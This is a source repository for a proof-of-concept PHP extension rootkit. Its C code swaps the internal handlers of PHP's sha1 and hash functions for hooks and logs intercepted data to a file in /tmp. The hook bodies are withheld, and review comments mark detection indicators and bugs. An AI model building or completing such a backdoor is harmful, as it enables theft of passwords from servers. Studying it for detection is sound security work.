├── .gitignore ├── LICENSE.md ├── README.md ├── lib └── .gitignore └── src ├── rootkit.c ├── rootkit_config.h ├── rootkit_hook.c └── rootkit_hook.h /.gitignore: -------------------------------------------------------------------------------- 1 | lib/php-src/ 2 | **/*.lo 3 | **/.libs 4 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | Copyright 2017 - Luke Paris (Paradoxis) 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, 4 | including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to 5 | do so, subject to the following conditions: 6 | 7 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 8 | 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 10 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF 11 | OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PHP Backdoor 2 | PHP module based backdoor to intercept standard-library & module function calls. 
For a full explanation of what this is, why it was made and how it works, please refer to my blog post [Your interpreter isn’t safe anymore — The PHP module rootkit](https://blog.paradoxis.nl/your-interpreter-isnt-safe-anymore-the-php-module-rootkit-c7ca6a1a9af5). 3 | 4 | 5 | ## Compilation 6 | To prevent malicious script kiddies from getting their hands on a weaponized PHP module, I've removed the compilation instructions alongside the implementation of the method hooks. 7 | 8 | Furthermore, I will not be releasing pre-compiled binaries. Any semi-experienced C developer should be able to find out how to compile PHP modules and implement the `rootkit_hook_function` 9 | method. 10 | 11 | Issues created regarding this will not be addressed and will be closed. 12 | 13 | 14 | ## Disclaimer 15 | Using this module might cause severe damage to your system; it was created as a proof of concept and should 16 | never be used on a production system! 17 | 18 | By using this software the person in question agrees that they will use any of the software in question in an ethical (non-malicious) way and agrees that the developer(s) are NOT held responsible for any damage caused by the use and/or abuse of this software. 19 | 20 | Misuse of any software from this website may result in criminal charges brought against the person in question, depending on the country or state of residence, which can result in probation, fines, or prison sentences of up to 20 years in federal prison. 
21 | 22 | 23 | ## License 24 | Copyright 2017 - Luke Paris (Paradoxis) 25 | 26 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 27 | 28 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 29 | 30 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
--------------------------------------------------------------------------------
/lib/.gitignore:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Paradoxis/PHP-Backdoor/a9c519b4b859d7a2327edde867cb0166aec7812c/lib/.gitignore
--------------------------------------------------------------------------------
/src/rootkit.c:
--------------------------------------------------------------------------------
// Libraries & frameworks
#include "php.h"

// Rootkit logic & configuration
#include "rootkit_config.h"
#include "rootkit_hook.h"
// NOTE(review): rootkit_hook/hash.h is not in this tree (the README says the
// hook implementations were deliberately withheld). It is the only place the
// hash__*_hook functions and hash__*_original pointers used below can come from.
#include "rootkit_hook/hash.h"


/**
 * On module init
 * Hook function calls such as 'md5' 'sha1' 'PDO' 'mysql_connect'
 *
 * What the visible code does: during MINIT (run once when the extension is
 * loaded) it replaces the internal handlers of the PHP functions "sha1" and
 * "hash" with the hooks declared in rootkit_hook/hash.h, keeping the genuine
 * handlers in hash__sha1_original / hash__hash_original so the hooks can still
 * reach them. Only those two names are hooked here; 'md5', 'PDO' and
 * 'mysql_connect' in the comment above are not.
 *
 * Defender's note: both hooked functions hash caller-supplied data, so the
 * (absent) hooks sit in the path of values such as passwords before they are
 * hashed. The artifacts this tree exposes are the extension name ROOTKIT_NAME
 * and the output path ROOTKIT_INTERCEPT_OUTPUT (rootkit_config.h,
 * rootkit_hook.h).
 *
 * Returns SUCCESS unconditionally: the bool result of rootkit_hook_function()
 * is discarded, so a hook that failed to apply is not reported to Zend.
 */
PHP_MINIT_FUNCTION(rootkit)
{
    rootkit_hook_function("sha1", hash__sha1_hook, &hash__sha1_original);
    rootkit_hook_function("hash", hash__hash_hook, &hash__hash_original);
    return SUCCESS;
}

/**
 * Module entry
 * Defines the module itself
 *
 * The functions table is NULL and there is no MINFO callback, so phpinfo()
 * gets no dedicated section from this module. It is nevertheless registered
 * under ROOTKIT_NAME ("rootkit" in rootkit_config.h), so listing the loaded
 * extensions (e.g. `php -m`, get_loaded_extensions()) should show that name —
 * presumably; verify on the PHP version in use. Detection should not hinge on
 * the name alone, since it is a build-time constant.
 */
zend_module_entry rootkit_module_entry = {
    STANDARD_MODULE_HEADER,
    ROOTKIT_NAME,
    NULL,                 /* All exposed functions, only to test POC, will get removed later */
    PHP_MINIT(rootkit),   /* On module startup */
    NULL,                 /* On module shutdown */
    NULL,                 /* On request start */
    NULL,                 /* On request end */
    NULL,                 /* Module info, used in phpinfo(); */
    ROOTKIT_VERSION,
    STANDARD_MODULE_PROPERTIES
};

/**
 * ZEND_GET_MODULE
 *
 * Description:
 * Provides additional C code used if you want to build a dynamic loaded extension.
 *
 * Parameters:
 * extension name - Name of the extension.
 *
 * Example:
 * // Enables DSO (Dynamic Shared Object) support for curl_extension
 * ZEND_GET_MODULE (curl_extension)
 *
 * Source:
 * http://webcache.googleusercontent.com/search?q=cache:tfNxKPKE3gEJ:php.webtutor.pl/en/2001/07/07/zend_get_module/+&cd=1&hl=en&ct=clnk&gl=nl
 */
ZEND_GET_MODULE(rootkit)
--------------------------------------------------------------------------------
/src/rootkit_config.h:
--------------------------------------------------------------------------------
#ifndef ROOTKIT_CONFIG_H
#define ROOTKIT_CONFIG_H

// Rootkit configuration
#define ROOTKIT_NAME "rootkit"      // extension name registered by rootkit_module_entry (rootkit.c)
#define ROOTKIT_VERSION "0.0.1"
#define ROOTKIT_DEBUG 1             // 1 = keep the php_printf() debug output in the build (see ROOTKIT_PRINTF)
// Path appended to by rootkit_write_output() in rootkit_hook.h. From a
// defender's view this fixed path under /tmp is the most concrete on-disk
// indicator this tree exposes.
#define ROOTKIT_INTERCEPT_OUTPUT "/tmp/php-module-rootkit.txt"

// Custom printf macro to strip all debug messages on compile-time
// Removes debugging strings from appearing during runtime & in the binary
// With ROOTKIT_DEBUG == 1 (the value set above) the messages in
// rootkit_hook.c are written to the PHP output stream via php_printf().
#if ROOTKIT_DEBUG == 1
#define ROOTKIT_PRINTF(...) php_printf(__VA_ARGS__)
#else
#define ROOTKIT_PRINTF(...) ((void) 0)
#endif

// Prevents my IDE from screaming that certain macros are not defined
// NOTE(review): Zend defines SUCCESS itself (as 0, to my recollection), and
// every file in this tree includes php.h before this header, so this fallback
// should never be the active definition. If it ever were, the value returned
// by PHP_MINIT_FUNCTION(rootkit) would disagree with Zend's convention —
// confirm against the PHP headers used for the build.
#ifndef SUCCESS
#define SUCCESS 1
#endif

#endif
--------------------------------------------------------------------------------
/src/rootkit_hook.c:
--------------------------------------------------------------------------------
#include "php.h"

#include "rootkit_config.h"

/**
 * Method to easily hook a method in a module by their names
 * All implementations are located in 'rootkit_hook/.(c|h)'
 *
 * Looks up method_name in the compiler-globals function table and, if found,
 * swaps that function's internal handler for `hook`, saving the previous
 * handler through `original`. The table entry keeps its name; only the C
 * handler behind it changes, so detection has to look at the handler pointer
 * or at the loaded-module list rather than at PHP-level function names.
 * MINIT runs once per interpreter start, so the swap presumably lasts for the
 * life of that process — confirm for the SAPI in use.
 *
 * Arguments:
 *   method_name - Method to hook (not validated; a NULL here reaches strlen())
 *   hook        - Hook to apply
 *   original    - Address to store the original pointer in
 *
 * Returns: true when the handler was replaced; false when hook or original is
 * NULL, or when the name is not in the table. The callers in rootkit.c
 * ignore this value.
 */
bool rootkit_hook_function(
    const char* method_name,
    void (*hook)(INTERNAL_FUNCTION_PARAMETERS),
    void (**original)(INTERNAL_FUNCTION_PARAMETERS)
) {
    // Found function will be temporarily stored in this
    zend_function *function;

    // Check whether or not a hook & original variable were actually passed
    if (!hook || !original) {
        ROOTKIT_PRINTF("Unable to apply hook, no hook address / original address holder provided!\n");
        return false;
    }

    // Remove the current function from the compiler_globals.function_table hash
    // and replace it with our hooked function instead :)
    // (Nothing is actually removed: the entry stays, only its handler field is
    // rewritten in place.)
    if ((function = zend_hash_str_find_ptr(CG(function_table), method_name, strlen(method_name))) != NULL) {
        *original = function->internal_function.handler;
        // `*hook` applied to a function pointer is the same function
        // designator as `hook`; the dereference is a no-op.
        function->internal_function.handler = *hook;
        // NOTE(review): &original and &hook are the addresses of this call's
        // parameter variables, not the two handler addresses the message
        // implies; the %p values printed are stack slots.
        ROOTKIT_PRINTF("Successfully hooked function '%s' (original: %p) -> (hook: %p)\n", method_name, &original, &hook);
        return true;
    } else {
        ROOTKIT_PRINTF("Unable to locate function '%s' in global function table.\n", method_name);
        return false;
    }
}
--------------------------------------------------------------------------------
/src/rootkit_hook.h:
--------------------------------------------------------------------------------
#ifndef ROOTKIT_HOOK_H
#define ROOTKIT_HOOK_H

#include "php.h"
#include "rootkit_config.h"

/* Contract is documented in rootkit_hook.c: returns false when hook/original
 * is NULL or when method_name is not present in CG(function_table). */
bool rootkit_hook_function(
    const char* method_name,
    void (*hook)(INTERNAL_FUNCTION_PARAMETERS),
    void (**original)(INTERNAL_FUNCTION_PARAMETERS)
);

/*
 * Appends one formatted record to ROOTKIT_INTERCEPT_OUTPUT
 * (/tmp/php-module-rootkit.txt per rootkit_config.h) on every expansion.
 * Nothing in this tree expands it; it is evidently meant for the withheld
 * hook implementations, and the file it writes is the on-disk artifact to
 * look for.
 *
 * NOTE(review), C-level:
 *   - expands to three statements and declares `FILE *output` at the point of
 *     use with no do { ... } while (0) wrapper, so it cannot be used as a
 *     single statement and two expansions in one scope redeclare `output`;
 *   - the fopen() result goes to fprintf()/fclose() unchecked;
 *   - `args...` named variadic parameters and `## args` are a GNU extension,
 *     not C99 `__VA_ARGS__`.
 */
#define rootkit_write_output(format, args...) \
    FILE *output = fopen(ROOTKIT_INTERCEPT_OUTPUT, "a+"); \
    fprintf(output, format, ## args); \
    fclose(output);

#endif
--------------------------------------------------------------------------------